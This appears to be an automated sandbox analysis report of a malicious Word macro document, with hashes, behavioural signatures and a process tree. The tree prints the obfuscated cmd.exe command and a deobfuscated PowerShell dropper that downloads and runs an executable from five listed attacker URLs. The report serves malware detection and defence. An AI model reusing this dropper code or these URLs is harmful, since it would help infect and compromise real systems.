Analysis

  • max time kernel
    102s
  • max time network
    133s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-09-2024 01:43

General

  • Target

    eed652a394cfa0bf878eb4f339afab5c_JaffaCakes118.doc

  • Size

    200KB

  • MD5

    eed652a394cfa0bf878eb4f339afab5c

  • SHA1

    bd65ee68bf93e5034792bed09aa5be126bcee540

  • SHA256

    5dcb15c147742a5321da1d0fbfa30d0d037ec424a6fdf5661ab94e54fda59acb

  • SHA512

    baa66cab34764366d82f25884551d028ff1ae2a9a7d5b1c745c040848607e6dde3f809da44f526751bced13146d2740626df29f8f3a22fe81f70692f74a2435a

  • SSDEEP

    6144:XgULVG5HGJG1VqDTQpzAiXajJ7qxPmdvm:XtG0IbzvX2qxA

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://hawkinscs.com/uBmDMGkJ

exe.dropper

http://hydrocarbonreports.com/0

exe.dropper

http://grupovisionpr.com/GJjBPh

exe.dropper

http://ajx3.com/akDJlHl

exe.dropper

http://kazak.zendo.in.ua/7G4P

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eed652a394cfa0bf878eb4f339afab5c_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3292
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c f^OR ; /^f , " delims=fo2XA tokens= 1 " , ; %^W , iN , ( , ; ' ; ; ^^FT^^yPe ; ^| ; FIN^^d^^S^^Tr , d^^f^^i ' ; ) ; do ; %^W; , yr2eOFUzM/^Vj^]N^j~a0p ; Jq9nYIeM/R " , ( (^SeT _^ =:Xw\=C pd^G^,i^3^(t5^c4DH^)h0^kg^an7}^z^.oFjs^yW'rN-ZS$^;^+b^@xM^e^JB{v^u^mlf^P/) )&& ; , fO^R , ; %^G ; ; ^IN , ( ^7^ +31 ^2^ ^ 50 ^ ^3^8 ^3^4^ 21 +5^0^ 5^7 ^+57 6^ 43^ ^2^3 59 3^4 ^4^ ^26^ ^ 50 ^ 2^ ^ ^40 ^ 31^ ; 46 ^33 5^0 ^ 1^6 ^ 14^ ^ ^;^ ;^ ^6 39 ^; 5^0 14 +3^0 ^ 36^ ^ 50^ ^ ^ 46 ^ 5 ^ 57 ^ ^11 ^ ^50^ ^26 14 44 ^ 43 ^2 58 ^ ,^ ^7^ ^4^ 37 ^ 21 ^ ^14^ 1^4 ^; 7^ ^0 60 ^+^60 ^21 ^25^ 2 , ^ ^,^ ^ 2^3^ ^ ^11 ; ^ 2^6 ^ 34^ ^; ; 16 ^ 3^4 ^, , +3^0 +16 ^ 31 ^ ^56 ^60 ^ 55 +52 5^6 ^ 1^8^ ^ ^49 9 ; 23 5^1 4^7 ^ 2^1^ 14 1^4 ^;^ ^ 7 ^ ^ 0 ^+60 60 ^ ^+21 3^5^ ^8 ^ 38 31 ^ +1^6 ^ 25^ ^3^8^ 46 ^ ^+31^ ^ ,^ ^,^ ^26 38^ ^ 50 7 ^ ^3^1 38 +14 ^34 ^+3^0 ;^ ^16 3^1 ^ ^56^ ,^ , 60^ ^ , 2^2^ 47 ^2^1 ^ 14 , ^14^ ^ 7^ 0 ^ +60 ^, ^ ^,^ 6^0 +^2^4 38^ ^ ^55 ; +7 3^1 ^ ^ ^; ^54^ ;^ ^ 11 ^ ^+34^ 11 3^1^ 26 ^7^ ^ +^38 30 16 3^1 ^ +^5^6^ , ^6^0 9^ ^ 51 33 +52 5^9^ ^, , ^21^ ^+4^7 ^ 2^1 1^4 ^14 ^7 ^ ^0 , 60 ;^ ^ +^60 , 2^5^ ^ 33^ ^ 48 +12 ^ 3^0 ^ 16 3^1 ^56 6^0 ,^ ^ , ^ 25 ^ ^23^ ^18 51 57 19^ ^ ; 57 ^47 21^ ^14 ^ ^ ^+14 7 0^ 6^0 ^ 6^0 23^ ^25 2^9^ ^25 ^ 23^ ^ ^30 ^ 29 ^ 50 26 ^ ^ ^8 +3^1 30^ ^; 11 26 +30 +55^ 25 ^+60 27 9 ^ 17^ 5^9 ^3^7 30^ 42 +^7 ^57 ^ 1^1 ^;^ 14 ^ +13 ^37 ^ ^ ;^ ^; ^47 ^37 ^ ^20 4^4 43 33 ,^ ^4^2 3^2 6 ; ; ^ 4 6 ^37 +15 ^; 12 ^15 37 ^ 44 43^ +4^1^ ^ 31 +1^ 4 , +^43 50^ ;^ ^26^ ^+54 0 ^; 1^4^ ^50 ^; ^ ^5^6^ 7 ^+45 3^7 3 ^+37^ 45 ^ 4^3 ^33 42^ 3^2 ^ 4^5 ^+^37 3^0 ^ 50^ ^4^8 +50^ ^ +37^ ,^ 44 +^5^8^ ^ ^ 3^1^ 3^8^ ^ 50^ +25 ; ^ ; ^ ^16 ^ 21 ; ^ ^13 ^,^ ^43 ^ 4^9 39 ^, ^ , +54 6 , +1^1 ^ 26 6^ 43^ 2 ^58 ^7 20^ 53^ 14 ^+^38^ ^35 53^ ^43^ 23 , ^ ^, ^59 34 ^; ^ 30^ 18^ +^31^ 2^ ^26 57^ 31 , ^,^ 25^ ^ 8 ^ 3^2 ^1^1 ;^ ^ 5^7^ 5^0^ ^ 1^3 43^ 4^9^ ^ 39 54 ^ , ^ ^1^0 , ^ 6 4^3 ^41 ^ ; ^; 31 1 ^; ; +20^ ; ^ 44 42 ^ , ^ ^ 1^4 ^25^ ^ ^+38 ^ 14 ^ ; ^; ^ ^40 59^ ^ 38 ^31 ^ 16 ^ ^50 +^34 ^+34^ 6^ +^43 41^ ^ 31 1 ^44^ ^46^ 3^8 ^ ^50 ^25 ^23 ^ ^; ;^ ^44 2^8 ^;^ ^ ;^ ^16 ^,^ 25 14 ^ ^16 2^1 ^ 53 +28 ^28 ^+6 6^ ^ ^ ^6 ^ 6 ^6 ^ ^6 ^,^ , ^ 6 6 ^6^ ^ +6 ,^ ^6^ +^6^ ^6 ^6 ^ +6 6^ 6 71) , D^o (^SEt ^} ^ =!^} ^ !!_^ :~ %^G, 1!)& , ; ^If ; ; %^G ; =^= ; , ^7^1 ; , (c^ALL ; %^} ^ :^~^ -35^8%) "
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:2704
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ^FT^yPe | FIN^d^S^Tr d^f^i
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2472
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" FTyPe "
          4⤵
            PID:4512
          • C:\Windows\system32\findstr.exe
            FINdSTr dfi
            4⤵
              PID:3216
          • C:\Windows\system32\cmd.exe
            cmd ; , yr2eOFUzM/Vj]Nj~a0p ; Jq9nYIeM/R " , ( (^SeT _^ =:Xw\=C pd^G^,i^3^(t5^c4DH^)h0^kg^an7}^z^.oFjs^yW'rN-ZS$^;^+b^@xM^e^JB{v^u^mlf^P/) )&& ; , fO^R , ; %^G ; ; ^IN , ( ^7^ +31 ^2^ ^ 50 ^ ^3^8 ^3^4^ 21 +5^0^ 5^7 ^+57 6^ 43^ ^2^3 59 3^4 ^4^ ^26^ ^ 50 ^ 2^ ^ ^40 ^ 31^ ; 46 ^33 5^0 ^ 1^6 ^ 14^ ^ ^;^ ;^ ^6 39 ^; 5^0 14 +3^0 ^ 36^ ^ 50^ ^ ^ 46 ^ 5 ^ 57 ^ ^11 ^ ^50^ ^26 14 44 ^ 43 ^2 58 ^ ,^ ^7^ ^4^ 37 ^ 21 ^ ^14^ 1^4 ^; 7^ ^0 60 ^+^60 ^21 ^25^ 2 , ^ ^,^ ^ 2^3^ ^ ^11 ; ^ 2^6 ^ 34^ ^; ; 16 ^ 3^4 ^, , +3^0 +16 ^ 31 ^ ^56 ^60 ^ 55 +52 5^6 ^ 1^8^ ^ ^49 9 ; 23 5^1 4^7 ^ 2^1^ 14 1^4 ^;^ ^ 7 ^ ^ 0 ^+60 60 ^ ^+21 3^5^ ^8 ^ 38 31 ^ +1^6 ^ 25^ ^3^8^ 46 ^ ^+31^ ^ ,^ ^,^ ^26 38^ ^ 50 7 ^ ^3^1 38 +14 ^34 ^+3^0 ;^ ^16 3^1 ^ ^56^ ,^ , 60^ ^ , 2^2^ 47 ^2^1 ^ 14 , ^14^ ^ 7^ 0 ^ +60 ^, ^ ^,^ 6^0 +^2^4 38^ ^ ^55 ; +7 3^1 ^ ^ ^; ^54^ ;^ ^ 11 ^ ^+34^ 11 3^1^ 26 ^7^ ^ +^38 30 16 3^1 ^ +^5^6^ , ^6^0 9^ ^ 51 33 +52 5^9^ ^, , ^21^ ^+4^7 ^ 2^1 1^4 ^14 ^7 ^ ^0 , 60 ;^ ^ +^60 , 2^5^ ^ 33^ ^ 48 +12 ^ 3^0 ^ 16 3^1 ^56 6^0 ,^ ^ , ^ 25 ^ ^23^ ^18 51 57 19^ ^ ; 57 ^47 21^ ^14 ^ ^ ^+14 7 0^ 6^0 ^ 6^0 23^ ^25 2^9^ ^25 ^ 23^ ^ ^30 ^ 29 ^ 50 26 ^ ^ ^8 +3^1 30^ ^; 11 26 +30 +55^ 25 ^+60 27 9 ^ 17^ 5^9 ^3^7 30^ 42 +^7 ^57 ^ 1^1 ^;^ 14 ^ +13 ^37 ^ ^ ;^ ^; ^47 ^37 ^ ^20 4^4 43 33 ,^ ^4^2 3^2 6 ; ; ^ 4 6 ^37 +15 ^; 12 ^15 37 ^ 44 43^ +4^1^ ^ 31 +1^ 4 , +^43 50^ ;^ ^26^ ^+54 0 ^; 1^4^ ^50 ^; ^ ^5^6^ 7 ^+45 3^7 3 ^+37^ 45 ^ 4^3 ^33 42^ 3^2 ^ 4^5 ^+^37 3^0 ^ 50^ ^4^8 +50^ ^ +37^ ,^ 44 +^5^8^ ^ ^ 3^1^ 3^8^ ^ 50^ +25 ; ^ ; ^ ^16 ^ 21 ; ^ ^13 ^,^ ^43 ^ 4^9 39 ^, ^ , +54 6 , +1^1 ^ 26 6^ 43^ 2 ^58 ^7 20^ 53^ 14 ^+^38^ ^35 53^ ^43^ 23 , ^ ^, ^59 34 ^; ^ 30^ 18^ +^31^ 2^ ^26 57^ 31 , ^,^ 25^ ^ 8 ^ 3^2 ^1^1 ;^ ^ 5^7^ 5^0^ ^ 1^3 43^ 4^9^ ^ 39 54 ^ , ^ ^1^0 , ^ 6 4^3 ^41 ^ ; ^; 31 1 ^; ; +20^ ; ^ 44 42 ^ , ^ ^ 1^4 ^25^ ^ ^+38 ^ 14 ^ ; ^; ^ ^40 59^ ^ 38 ^31 ^ 16 ^ ^50 +^34 ^+34^ 6^ +^43 41^ ^ 31 1 ^44^ ^46^ 3^8 ^ ^50 ^25 ^23 ^ ^; ;^ ^44 2^8 ^;^ ^ ;^ ^16 ^,^ 25 14 ^ ^16 2^1 ^ 53 +28 ^28 ^+6 6^ ^ ^ ^6 ^ 6 ^6 ^ ^6 ^,^ , ^ 6 6 ^6^ ^ +6 ,^ ^6^ +^6^ ^6 ^6 ^ +6 6^ 6 71) , D^o (^SEt ^} ^ =!^} ^ !!_^ :~ %^G, 1!)& , ; ^If ; ; %^G ; =^= ; , ^7^1 ; , (c^ALL ; %^} ^ :^~^ -35^8%) "
            3⤵
            • An obfuscated cmd.exe command-line is typically used to evade detection.
            • Suspicious use of WriteProcessMemory
            PID:5020
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell $kPs=new-object Net.WebClient;$wfp='http://hawkinscs.com/uBmDMGkJ@http://hydrocarbonreports.com/0@http://grupovisionpr.com/GJjBPh@http://ajx3.com/akDJlHl@http://kazak.zendo.in.ua/7G4P'.Split('@');$jSF = '535';$ZoX=$env:temp+'\'+$jSF+'.exe';foreach($MNv in $wfp){try{$kPs.DownloadFile($MNv, $ZoX);Start-Process $ZoX;break;}catch{}}
              4⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4436

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\TCDD3F5.tmp\sist02.xsl

        Filesize

        245KB

        MD5

        f883b260a8d67082ea895c14bf56dd56

        SHA1

        7954565c1f243d46ad3b1e2f1baf3281451fc14b

        SHA256

        ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

        SHA512

        d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1dxnyn34.ouy.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

        Filesize

        16B

        MD5

        d29962abc88624befc0135579ae485ec

        SHA1

        e40a6458296ec6a2427bcb280572d023a9862b31

        SHA256

        a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866

        SHA512

        4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

      • memory/3292-12-0x00007FFFE3D70000-0x00007FFFE3F65000-memory.dmp

        Filesize

        2.0MB

      • memory/3292-2-0x00007FFFA3DF0000-0x00007FFFA3E00000-memory.dmp

        Filesize

        64KB

      • memory/3292-8-0x00007FFFE3D70000-0x00007FFFE3F65000-memory.dmp

        Filesize

        2.0MB

      • memory/3292-10-0x00007FFFE3D70000-0x00007FFFE3F65000-memory.dmp

        Filesize

        2.0MB

      • memory/3292-9-0x00007FFFE3D70000-0x00007FFFE3F65000-memory.dmp

        Filesize

        2.0MB

      • memory/3292-0-0x00007FFFA3DF0000-0x00007FFFA3E00000-memory.dmp

        Filesize

        64KB

      • memory/3292-13-0x00007FFFA1D90000-0x00007FFFA1DA0000-memory.dmp

        Filesize

        64KB

      • memory/3292-14-0x00007FFFE3D70000-0x00007FFFE3F65000-memory.dmp

        Filesize

        2.0MB

      • memory/3292-15-0x00007FFFE3D70000-0x00007FFFE3F65000-memory.dmp

        Filesize

        2.0MB

      • memory/3292-16-0x00007FFFA1D90000-0x00007FFFA1DA0000-memory.dmp

        Filesize

        64KB

      • memory/3292-17-0x00007FFFE3D70000-0x00007FFFE3F65000-memory.dmp

        Filesize

        2.0MB

      • memory/3292-18-0x00007FFFE3D70000-0x00007FFFE3F65000-memory.dmp

        Filesize

        2.0MB

      • memory/3292-20-0x00007FFFE3D70000-0x00007FFFE3F65000-memory.dmp

        Filesize

        2.0MB

      • memory/3292-19-0x00007FFFE3D70000-0x00007FFFE3F65000-memory.dmp

        Filesize

        2.0MB

      • memory/3292-571-0x00007FFFE3D70000-0x00007FFFE3F65000-memory.dmp

        Filesize

        2.0MB

      • memory/3292-3-0x00007FFFE3E0D000-0x00007FFFE3E0E000-memory.dmp

        Filesize

        4KB

      • memory/3292-7-0x00007FFFE3D70000-0x00007FFFE3F65000-memory.dmp

        Filesize

        2.0MB

      • memory/3292-6-0x00007FFFE3D70000-0x00007FFFE3F65000-memory.dmp

        Filesize

        2.0MB

      • memory/3292-45-0x00007FFFE3D70000-0x00007FFFE3F65000-memory.dmp

        Filesize

        2.0MB

      • memory/3292-5-0x00007FFFA3DF0000-0x00007FFFA3E00000-memory.dmp

        Filesize

        64KB

      • memory/3292-11-0x00007FFFE3D70000-0x00007FFFE3F65000-memory.dmp

        Filesize

        2.0MB

      • memory/3292-4-0x00007FFFA3DF0000-0x00007FFFA3E00000-memory.dmp

        Filesize

        64KB

      • memory/3292-62-0x00007FFFE3D70000-0x00007FFFE3F65000-memory.dmp

        Filesize

        2.0MB

      • memory/3292-72-0x00007FFFE3D70000-0x00007FFFE3F65000-memory.dmp

        Filesize

        2.0MB

      • memory/3292-1-0x00007FFFA3DF0000-0x00007FFFA3E00000-memory.dmp

        Filesize

        64KB

      • memory/3292-567-0x00007FFFA3DF0000-0x00007FFFA3E00000-memory.dmp

        Filesize

        64KB

      • memory/3292-569-0x00007FFFA3DF0000-0x00007FFFA3E00000-memory.dmp

        Filesize

        64KB

      • memory/3292-570-0x00007FFFA3DF0000-0x00007FFFA3E00000-memory.dmp

        Filesize

        64KB

      • memory/3292-568-0x00007FFFA3DF0000-0x00007FFFA3E00000-memory.dmp

        Filesize

        64KB

      • memory/4436-57-0x000001B9723B0000-0x000001B9723D2000-memory.dmp

        Filesize

        136KB